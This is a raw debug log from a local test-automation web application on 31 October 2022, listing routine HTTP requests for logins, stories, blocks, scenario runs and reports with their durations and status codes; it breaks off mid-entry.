debug: [1667210776706, duration: 59] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T10:06:32.751Z debug: [1667210792739, duration: 11] PUT:/6357a21542797f1390c87c75/db/9, reqOrigin: ::1, resCode: 200 +2022-10-31T10:06:44.026Z debug: [1667210803942, duration: 83] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T10:06:44.064Z debug: [1667210804057, duration: 7] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T10:06:44.105Z debug: [1667210804103, duration: 2] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T10:06:44.169Z debug: [1667210804162, duration: 7] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T10:06:44.172Z debug: [1667210804164, duration: 7] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T10:06:44.181Z debug: [1667210804161, duration: 20] GET:/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T10:06:45.902Z debug: [1667210805899, duration: 2] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T10:06:45.930Z debug: [1667210805927, duration: 3] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T10:06:55.696Z debug: [1667210815691, duration: 4] PUT:/635f94fcfa76542960ac12a5/db/1, reqOrigin: ::1, resCode: 200 +2022-10-31T10:14:50.905Z debug: [1667211290885, duration: 18] PUT:/6357a21542797f1390c87c75/db/9, reqOrigin: ::1, resCode: 200 +2022-10-31T10:15:14.744Z debug: [1667211314729, duration: 14] PUT:/6357a21542797f1390c87c75/db/9, reqOrigin: ::1, resCode: 200 +2022-10-31T10:15:19.421Z debug: [1667211319411, duration: 10] GET:/reportHistory/6357a21542797f1390c87c75, reqOrigin: ::1, resCode: 304 +2022-10-31T10:15:29.373Z debug: [1667211329053, duration: 319] GET:/report/reporting_1667209557438, reqOrigin: ::1, resCode: 200 +2022-10-31T10:15:39.735Z debug: [1667211339733, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:15:39.751Z debug: [1667211339749, duration: 1] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:15:44.972Z debug: [1667211344963, duration: 5] PUT:/635f94fcfa76542960ac12a5/db/1, reqOrigin: ::1, resCode: 200 +2022-10-31T10:15:45.826Z debug: [1667211345813, duration: 13] PUT:/6357a21542797f1390c87c75/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T10:15:50.401Z debug: [1667211350393, duration: 8] GET:/reportHistory/6357a21542797f1390c87c75, reqOrigin: ::1, resCode: 304 +2022-10-31T10:15:50.734Z debug: [1667211350729, duration: 4] PUT:/635f94fcfa76542960ac12a5/db/1, reqOrigin: ::1, resCode: 200 +2022-10-31T10:15:53.140Z debug: [1667211353137, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:15:53.159Z debug: [1667211353157, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:15:57.305Z debug: [1667211357303, duration: 2] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:15:57.385Z debug: [1667211357376, duration: 9] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T10:15:57.389Z debug: [1667211357383, duration: 5] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:15:57.414Z debug: [1667211357409, duration: 5] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T10:15:57.418Z debug: [1667211357410, duration: 6] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:15:57.436Z debug: [1667211357381, duration: 54] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T10:15:57.493Z debug: [1667211357455, duration: 37] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:16:00.456Z debug: [1667211360454, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:16:00.475Z debug: [1667211360473, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:16:27.345Z debug: [1667211387337, duration: 8] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 200 +2022-10-31T10:16:30.825Z debug: [1667211390822, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:16:30.843Z debug: [1667211390840, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:16:47.245Z debug: [1667211393667, duration: 13578] POST:/Scenario/6357a20842797f1390c87c74/db/1, reqOrigin: ::1, resCode: 200 +2022-10-31T10:16:47.318Z debug: [1667211407314, duration: 4] GET:/report/635fa08ffa76542960ac12b7, reqOrigin: ::1, resCode: 200 +2022-10-31T10:16:57.620Z debug: [1667211417599, duration: 20] POST:/6357a21542797f1390c87c75/db, reqOrigin: ::1, resCode: 200 +2022-10-31T10:17:56.474Z debug: [1667211476465, duration: 9] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 200 +2022-10-31T10:18:32.905Z debug: [1667211512830, duration: 75] GET:/report/reporting_1667211393672, reqOrigin: ::1, resCode: 200 +2022-10-31T10:19:46.979Z debug: [1667211586975, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:19:46.998Z debug: [1667211586995, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:19:52.075Z debug: [1667211592067, duration: 8] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T10:19:55.646Z debug: [1667211595644, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:19:55.666Z debug: [1667211595663, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:20:15.627Z debug: [1667211602215, duration: 13411] POST:/Scenario/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T10:20:15.685Z debug: [1667211615683, duration: 2] GET:/report/635fa15ffa76542960ac12b9, reqOrigin: ::1, resCode: 200 +2022-10-31T10:21:40.727Z debug: [1667211700709, duration: 17] PUT:/6357a21542797f1390c87c75/db/10, reqOrigin: ::1, resCode: 200 +2022-10-31T10:21:44.461Z debug: [1667211704447, duration: 14] PUT:/6357a21542797f1390c87c75/db/10, reqOrigin: ::1, resCode: 200 +2022-10-31T10:22:13.012Z debug: [1667211733009, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:22:13.099Z debug: [1667211733089, duration: 9] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:22:13.104Z debug: [1667211733099, duration: 5] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T10:22:13.125Z debug: [1667211733121, duration: 4] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:22:13.133Z debug: [1667211733128, duration: 5] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T10:22:13.152Z debug: [1667211733085, duration: 66] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T10:22:13.221Z debug: [1667211733173, duration: 47] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:22:15.081Z debug: [1667211735079, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:22:15.127Z debug: [1667211735100, duration: 24] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:22:40.950Z debug: [1667211760947, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:23:08.352Z debug: [1667211788340, duration: 11] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 200 +2022-10-31T10:23:11.162Z debug: [1667211791084, duration: 77] GET:/report/reporting_1667211602222, reqOrigin: ::1, resCode: 200 +2022-10-31T10:23:11.508Z debug: [1667211791483, duration: 24] POST:/6357a21542797f1390c87c75/db, reqOrigin: ::1, resCode: 200 +2022-10-31T10:23:16.843Z debug: [1667211796826, duration: 15] PUT:/6357a21542797f1390c87c75/db/11, reqOrigin: ::1, resCode: 200 +2022-10-31T10:23:23.787Z debug: [1667211803760, duration: 27] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:23:23.835Z debug: [1667211803825, duration: 8] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:23:59.639Z debug: [1667211839629, duration: 8] PUT:/6357a20842797f1390c87c74/db/3, reqOrigin: ::1, resCode: 200 +2022-10-31T10:24:16.598Z debug: [1667211856583, duration: 15] PUT:/6357a20842797f1390c87c74/db/4, reqOrigin: ::1, resCode: 200 +2022-10-31T10:24:25.404Z debug: [1667211865396, duration: 7] PUT:/6357a20842797f1390c87c74/db/5, reqOrigin: ::1, resCode: 200 +2022-10-31T10:24:44.680Z debug: [1667211884671, duration: 8] PUT:/6357a20842797f1390c87c74/db/6, reqOrigin: ::1, resCode: 200 +2022-10-31T10:25:05.828Z debug: [1667211905812, duration: 12] PUT:/6357a20842797f1390c87c74/db/7, reqOrigin: ::1, resCode: 200 +2022-10-31T10:25:12.442Z debug: [1667211912433, duration: 8] PUT:/6357a20842797f1390c87c74/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T10:25:38.684Z debug: [1667211938675, duration: 8] PUT:/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T10:26:00.630Z debug: [1667211944351, duration: 16277] POST:/Scenario/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T10:26:00.696Z debug: [1667211960694, duration: 2] GET:/report/635fa2b8fa76542960ac12bb, reqOrigin: ::1, resCode: 200 +2022-10-31T10:28:09.058Z debug: [1667212089041, duration: 16] PUT:/6357a21542797f1390c87c75/db/11, reqOrigin: ::1, resCode: 200 +2022-10-31T10:28:45.756Z debug: [1667212125734, duration: 19] PUT:/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T10:28:50.764Z debug: [1667212130754, duration: 9] PUT:/6357a20842797f1390c87c74/db/3, reqOrigin: ::1, resCode: 200 +2022-10-31T10:28:56.805Z debug: [1667212136796, duration: 9] PUT:/6357a20842797f1390c87c74/db/4, reqOrigin: ::1, resCode: 200 +2022-10-31T10:29:03.748Z debug: [1667212143734, duration: 7] PUT:/6357a20842797f1390c87c74/db/5, reqOrigin: ::1, resCode: 200 +2022-10-31T10:29:41.282Z debug: [1667212159618, duration: 21664] POST:/Scenario/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T10:29:41.373Z debug: [1667212181365, duration: 2] GET:/report/635fa395fa76542960ac12bd, reqOrigin: ::1, resCode: 200 +2022-10-31T10:29:47.545Z debug: [1667212187537, duration: 8] GET:/reportHistory/6357a21542797f1390c87c75, reqOrigin: ::1, resCode: 304 +2022-10-31T10:29:51.131Z debug: [1667212191129, duration: 1] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:29:51.178Z debug: [1667212191174, duration: 4] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:30:47.144Z debug: [1667212247120, duration: 24] POST:/6357a21542797f1390c87c75/db, reqOrigin: ::1, resCode: 200 +2022-10-31T10:30:54.723Z debug: [1667212254721, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:30:58.125Z debug: [1667212258122, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:30:58.206Z debug: [1667212258198, duration: 6] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:30:58.207Z debug: [1667212258201, duration: 6] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T10:30:58.254Z debug: [1667212258231, duration: 22] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:30:58.254Z debug: [1667212258175, duration: 79] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T10:30:58.256Z debug: [1667212258239, duration: 17] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T10:30:58.431Z debug: [1667212258356, duration: 49] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:31:01.860Z debug: [1667212261856, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:31:01.891Z debug: [1667212261888, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:31:41.962Z debug: [1667212301942, duration: 17] PUT:/6357a21542797f1390c87c75/db/12, reqOrigin: ::1, resCode: 200 +2022-10-31T10:32:25.925Z debug: [1667212310839, duration: 35086] POST:/Scenario/6357a21542797f1390c87c75/db/6, reqOrigin: ::1, resCode: 200 +2022-10-31T10:32:26.036Z debug: [1667212346033, duration: 2] GET:/report/635fa439fa76542960ac12bf, reqOrigin: ::1, resCode: 200 +2022-10-31T10:33:31.555Z debug: [1667212411537, duration: 18] PUT:/6357a21542797f1390c87c75/db/6, reqOrigin: ::1, resCode: 200 +2022-10-31T10:33:40.108Z debug: [1667212420102, duration: 5] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:33:40.286Z debug: [1667212420279, duration: 6] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:33:57.870Z debug: [1667212437859, duration: 9] PUT:/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T10:34:12.953Z debug: [1667212452933, duration: 20] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 200 +2022-10-31T10:34:13.947Z debug: [1667212453943, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:34:13.968Z debug: [1667212453965, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:34:25.776Z debug: [1667212414805, duration: 50963] POST:/Scenario/6357a21542797f1390c87c75/db/6, reqOrigin: ::1, resCode: 200 +2022-10-31T10:34:25.818Z debug: [1667212439662, duration: 26153] POST:/Scenario/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T10:34:25.945Z debug: [1667212465941, duration: 2] GET:/report/635fa4b1fa76542960ac12c3, reqOrigin: ::1, resCode: 200 +2022-10-31T10:34:25.997Z debug: [1667212465983, duration: 14] GET:/report/635fa4b1fa76542960ac12c1, reqOrigin: ::1, resCode: 200 +2022-10-31T10:34:39.316Z debug: [1667212479308, duration: 8] PUT:/6357a20842797f1390c87c74/db/5, reqOrigin: ::1, resCode: 200 +2022-10-31T10:34:43.627Z debug: [1667212483614, duration: 13] PUT:/6357a21542797f1390c87c75/db/7, reqOrigin: ::1, resCode: 200 +2022-10-31T10:34:49.719Z debug: [1667212489708, duration: 10] PUT:/6357a20842797f1390c87c74/db/6, reqOrigin: ::1, resCode: 200 +2022-10-31T10:35:16.993Z debug: [1667212516984, duration: 9] PUT:/6357a20842797f1390c87c74/db/5, reqOrigin: ::1, resCode: 200 +2022-10-31T10:35:28.464Z debug: [1667212528455, duration: 9] PUT:/6357a20842797f1390c87c74/db/5, reqOrigin: ::1, resCode: 200 +2022-10-31T10:35:37.842Z debug: [1667212537831, duration: 11] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 200 +2022-10-31T10:35:41.394Z debug: [1667212541268, duration: 125] GET:/report/reporting_1667212439666, reqOrigin: ::1, resCode: 200 +2022-10-31T10:35:55.429Z debug: [1667212555426, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:35:55.456Z debug: [1667212555453, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:35:58.844Z debug: [1667212558842, duration: 2] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T10:36:28.782Z debug: [1667212561648, duration: 27134] POST:/Scenario/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T10:36:28.872Z debug: [1667212588869, duration: 2] GET:/report/635fa52cfa76542960ac12c7, reqOrigin: ::1, resCode: 200 +2022-10-31T10:36:32.462Z debug: [1667212485269, duration: 107192] POST:/Scenario/6357a21542797f1390c87c75/db/7, reqOrigin: ::1, resCode: 200 +2022-10-31T10:36:32.691Z debug: [1667212592688, duration: 2] GET:/report/635fa530fa76542960ac12c9, reqOrigin: ::1, resCode: 200 +2022-10-31T10:37:15.865Z debug: [1667212603372, duration: 32492] POST:/Scenario/6357a21542797f1390c87c75/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T10:37:16.944Z debug: [1667212636941, duration: 3] GET:/report/635fa55bfa76542960ac12cb, reqOrigin: ::1, resCode: 200 +2022-10-31T10:38:11.106Z debug: [1667212663521, duration: 27584] POST:/Scenario/6357a21542797f1390c87c75/db/9, reqOrigin: ::1, resCode: 200 +2022-10-31T10:38:12.043Z debug: [1667212692041, duration: 2] GET:/report/635fa593fa76542960ac12cd, reqOrigin: ::1, resCode: 200 +2022-10-31T10:40:20.233Z debug: [1667212820217, duration: 16] PUT:/6357a21542797f1390c87c75/db/9, reqOrigin: ::1, resCode: 200 +2022-10-31T10:41:01.360Z debug: [1667212822947, duration: 38413] POST:/Scenario/6357a21542797f1390c87c75/db/9, reqOrigin: ::1, resCode: 200 +2022-10-31T10:41:01.457Z debug: [1667212861455, duration: 2] GET:/report/635fa63dfa76542960ac12cf, reqOrigin: ::1, resCode: 200 +2022-10-31T10:42:29.007Z debug: [1667212948987, duration: 19] PUT:/6357a21542797f1390c87c75/db/9, reqOrigin: ::1, resCode: 200 +2022-10-31T10:43:21.949Z debug: [1667212951668, duration: 50280] POST:/Scenario/6357a21542797f1390c87c75/db/9, reqOrigin: ::1, resCode: 200 +2022-10-31T10:43:22.047Z debug: [1667213002044, duration: 2] GET:/report/635fa6c9fa76542960ac12d1, reqOrigin: ::1, resCode: 200 +2022-10-31T10:44:10.411Z debug: [1667213050394, duration: 17] PUT:/6357a21542797f1390c87c75/db/9, reqOrigin: ::1, resCode: 200 +2022-10-31T10:45:21.658Z debug: [1667213053079, duration: 68578] POST:/Scenario/6357a21542797f1390c87c75/db/9, reqOrigin: ::1, resCode: 200 +2022-10-31T10:45:21.802Z debug: [1667213121799, duration: 3] GET:/report/635fa741fa76542960ac12d3, reqOrigin: ::1, resCode: 200 +2022-10-31T10:46:09.102Z debug: [1667213133721, duration: 35381] POST:/Scenario/6357a21542797f1390c87c75/db/10, reqOrigin: ::1, resCode: 200 +2022-10-31T10:46:09.182Z debug: [1667213169179, duration: 3] GET:/report/635fa771fa76542960ac12d5, reqOrigin: ::1, resCode: 200 +2022-10-31T10:46:21.668Z debug: [1667213181652, duration: 15] PUT:/6357a21542797f1390c87c75/db/10, reqOrigin: ::1, resCode: 200 +2022-10-31T10:47:22.548Z debug: [1667213192927, duration: 49621] POST:/Scenario/6357a21542797f1390c87c75/db/10, reqOrigin: ::1, resCode: 200 +2022-10-31T10:47:22.686Z debug: [1667213242683, duration: 2] GET:/report/635fa7bafa76542960ac12d7, reqOrigin: ::1, resCode: 200 +2022-10-31T10:47:56.547Z debug: [1667213276531, duration: 15] PUT:/6357a21542797f1390c87c75/db/11, reqOrigin: ::1, resCode: 200 +2022-10-31T10:48:54.180Z debug: [1667213279478, duration: 54702] POST:/Scenario/6357a21542797f1390c87c75/db/11, reqOrigin: ::1, resCode: 200 +2022-10-31T10:48:54.466Z debug: [1667213334463, duration: 2] GET:/report/635fa816fa76542960ac12d9, reqOrigin: ::1, resCode: 200 +2022-10-31T10:50:43.187Z debug: [1667213443184, duration: 2] GET:/logout, reqOrigin: ::1, resCode: 304 +2022-10-31T10:50:44.662Z debug: [1667213444577, duration: 85] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T10:50:44.702Z debug: [1667213444693, duration: 9] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T10:50:44.750Z debug: [1667213444745, duration: 5] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T10:50:44.815Z debug: [1667213444807, duration: 6] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T10:50:44.816Z debug: [1667213444808, duration: 7] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T10:50:44.828Z debug: [1667213444805, duration: 22] GET:/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 200 +2022-10-31T10:50:50.068Z debug: [1667213450065, duration: 3] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T10:50:50.111Z debug: [1667213450103, duration: 5] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T10:50:57.042Z debug: [1667213457040, duration: 2] GET:/6238538930768bfa183c93ad, reqOrigin: ::1, resCode: 304 +2022-10-31T10:50:57.111Z debug: [1667213457108, duration: 2] GET:/6238538930768bfa183c93ad, reqOrigin: ::1, resCode: 304 +2022-10-31T10:50:57.146Z debug: [1667213457143, duration: 3] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T10:50:57.152Z debug: [1667213457144, duration: 8] GET:/6238538930768bfa183c93ad, reqOrigin: ::1, resCode: 304 +2022-10-31T10:50:57.178Z debug: [1667213457174, duration: 4] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T10:50:57.216Z debug: [1667213457142, duration: 74] GET:/stories/?repoName=HAH&source=db&id=6238538930768bfa183c93ad, reqOrigin: ::1, resCode: 304 +2022-10-31T10:50:57.300Z debug: [1667213457246, duration: 53] GET:/stories/?repoName=HAH&source=db&id=6238538930768bfa183c93ad, reqOrigin: ::1, resCode: 304 +2022-10-31T10:51:02.955Z debug: [1667213462953, duration: 2] GET:/user/, reqOrigin: ::1, resCode: 304 +2022-10-31T10:51:02.960Z debug: [1667213462952, duration: 7] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T10:51:08.765Z debug: [1667213468763, duration: 2] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:51:08.799Z debug: [1667213468796, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:51:08.835Z debug: [1667213468831, duration: 4] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T10:51:08.862Z debug: [1667213468813, duration: 48] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T10:51:14.288Z debug: [1667213474285, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:51:14.318Z debug: [1667213474314, duration: 4] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:51:18.044Z debug: [1667213478036, duration: 8] GET:/reportHistory/635688ce42797f1390c87c6b, reqOrigin: ::1, resCode: 200 +2022-10-31T10:51:20.132Z debug: [1667213480123, duration: 9] GET:/reportHistory/6357a1da42797f1390c87c70, reqOrigin: ::1, resCode: 200 +2022-10-31T10:51:21.596Z debug: [1667213481586, duration: 9] GET:/reportHistory/6357a1e942797f1390c87c71, reqOrigin: ::1, resCode: 200 +2022-10-31T10:51:28.487Z debug: [1667213485069, duration: 3417] GET:/report/reporting_1667209852374, reqOrigin: ::1, resCode: 200 +2022-10-31T10:51:30.348Z debug: [1667213490333, duration: 15] PUT:/6357a21542797f1390c87c75/db/12, reqOrigin: ::1, resCode: 200 +2022-10-31T10:52:48.916Z debug: [1667213568880, duration: 35] POST:/6357a21542797f1390c87c75/db, reqOrigin: ::1, resCode: 200 +2022-10-31T10:53:51.315Z debug: [1667213631305, duration: 10] GET:/reportHistory/6357a1f442797f1390c87c72, reqOrigin: ::1, resCode: 200 +2022-10-31T10:53:53.259Z debug: [1667213633252, duration: 7] GET:/reportHistory/6357a1fc42797f1390c87c73, reqOrigin: ::1, resCode: 200 +2022-10-31T10:53:55.351Z debug: [1667213635342, duration: 8] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 200 +2022-10-31T10:53:59.673Z debug: [1667213639670, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:53:59.705Z debug: [1667213639700, duration: 5] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:54:59.510Z debug: [1667213699493, duration: 17] PUT:/6357a21542797f1390c87c75/db/13, reqOrigin: ::1, resCode: 200 +2022-10-31T10:55:27.332Z debug: [1667213701239, duration: 26091] POST:/Scenario/6357a21542797f1390c87c75/db/13, reqOrigin: ::1, resCode: 200 +2022-10-31T10:55:27.478Z debug: [1667213727474, duration: 3] GET:/report/635fa99ffa76542960ac12db, reqOrigin: ::1, resCode: 200 +2022-10-31T10:55:28.941Z debug: [1667213728937, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:56:02.922Z debug: [1667213762882, duration: 39] POST:/6357a21542797f1390c87c75/db, reqOrigin: ::1, resCode: 200 +2022-10-31T10:56:40.562Z debug: [1667213800543, duration: 19] PUT:/6357a21542797f1390c87c75/db/14, reqOrigin: ::1, resCode: 200 +2022-10-31T10:57:10.062Z debug: [1667213830051, duration: 10] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 200 +2022-10-31T10:57:15.839Z debug: [1667213835492, duration: 347] GET:/report/reporting_1667213646673, reqOrigin: ::1, resCode: 200 +2022-10-31T10:58:16.415Z debug: [1667213896405, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:58:16.436Z debug: [1667213896433, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:59:03.378Z debug: [1667213943374, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:59:40.480Z debug: [1667213980463, duration: 16] PUT:/6357a21542797f1390c87c75/db/14, reqOrigin: ::1, resCode: 200 +2022-10-31T10:59:52.430Z debug: [1667213992414, duration: 15] PUT:/6357a21542797f1390c87c75/db/14, reqOrigin: ::1, resCode: 200 +2022-10-31T11:00:02.690Z debug: [1667214002686, duration: 4] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:00:02.770Z debug: [1667214002764, duration: 6] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:00:02.775Z debug: [1667214002770, duration: 4] GET:/stepTypes, reqOrigin: ::1, resCode: 200 +2022-10-31T11:00:02.811Z debug: [1667214002788, duration: 22] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:00:02.812Z debug: [1667214002802, duration: 9] GET:/stepTypes, reqOrigin: ::1, resCode: 200 +2022-10-31T11:00:02.878Z debug: [1667214002771, duration: 104] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:00:02.905Z debug: [1667214002803, duration: 101] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:00:06.444Z debug: [1667214006422, duration: 20] PUT:/6357a21542797f1390c87c75/db/13, reqOrigin: ::1, resCode: 200 +2022-10-31T11:00:06.646Z debug: [1667214006641, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:00:06.674Z debug: [1667214006671, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:00:09.463Z debug: [1667214009460, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:01:28.580Z debug: [1667214088573, duration: 6] POST:/background/update/6357a20842797f1390c87c74/db, reqOrigin: ::1, resCode: 200 +2022-10-31T11:01:31.820Z debug: [1667214091809, duration: 